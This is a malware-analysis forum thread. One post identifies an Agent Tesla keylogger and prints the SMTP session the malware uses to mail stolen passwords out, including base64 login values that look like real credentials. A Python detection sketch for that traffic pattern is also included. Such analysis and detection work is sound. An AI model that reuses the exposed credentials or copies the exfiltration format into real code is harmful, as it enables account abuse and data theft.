Malware collection

Forum for analysis and discussion about malware.

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 1:04 pm

ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Post by ikolor » Sat Apr 08, 2017 6:51 pm


Re: Malware collection

Post by ikolor » Mon Apr 17, 2017 10:39 am


Re: Malware collection

Post by Antelox » Mon Apr 17, 2017 3:00 pm



This is the Agent Tesla keylogger. A sample of the email header sent containing exfiltrated data:

EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable


BR,

Antelox
Antelox
 
Posts: 70
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 37
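
A detection sketch for the SMTP pattern in the sample above, added here as an example and not part of the original post. It flags a client transcript by the subject marker seen in the sample and records two supporting traits (envelope sender equal to recipient, `AUTH login`); the session text, addresses and indicator names are constructed, and treating these traits as a signature is an assumption drawn from this single sample.

```python
import re

# Constructed transcripts (not captured traffic); addresses and host are placeholders.
SUSPECT = """EHLO host1
AUTH login <base64-user>
<base64-pass>
MAIL FROM:<box@example.com>
RCPT TO:<box@example.com>
DATA
MIME-Version: 1.0
From: box@example.com
To: box@example.com
Subject: user1/HOST1 Passwords Recovered From: 10.0.0.5 [Agent Tesla]
Content-Type: text/html; charset=us-ascii
"""

BENIGN = """EHLO host2
AUTH login <base64-user>
<base64-pass>
MAIL FROM:<alice@example.com>
RCPT TO:<bob@example.org>
DATA
Subject: Quarterly report
"""

# Subject layout taken from the sample: "... Recovered From: ... [Agent Tesla]"
SUBJECT_RE = re.compile(r"^Subject:.*Recovered From:.*\[Agent Tesla\]", re.I | re.M)
ADDR_RE = r"^{}:\s*<([^>]+)>"

def envelope(session, verb):
    """Return the lower-cased addresses on MAIL FROM / RCPT TO lines."""
    return {a.lower() for a in re.findall(ADDR_RE.format(verb), session, re.I | re.M)}

def score_session(session):
    """Return the indicators (hypothetical names) matched in one SMTP client transcript."""
    hits = []
    if SUBJECT_RE.search(session):
        hits.append("subject_marker")
    sender, rcpts = envelope(session, "MAIL FROM"), envelope(session, "RCPT TO")
    if sender and sender == rcpts:  # mailbox sends the report to itself
        hits.append("self_addressed")
    if re.search(r"^AUTH login\b", session, re.I | re.M):
        hits.append("auth_login")
    return hits

def is_suspect(session):
    # Only the subject marker is decisive; the other two are common in benign mail.
    return "subject_marker" in score_session(session)
```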

Re: Malware collection

Post by ikolor » Fri Apr 21, 2017 5:08 pm


Re: Malware collection

Post by Antelox » Fri Apr 21, 2017 8:16 pm



Doesn't look malicious to me. This is the last version of a music downloader which can be downloaded from:

http://audiovkontakte.ru/vksaver/vksaver-install.exe


Home page:

http://audiovkontakte.ru


BR,

Antelox

Re: Malware collection

Post by ikolor » Sat Apr 22, 2017 4:30 pm


Re: Malware collection

Post by Antelox » Sat Apr 22, 2017 6:38 pm


Re: Malware collection

Post by ikolor » Wed Apr 26, 2017 7:49 pm

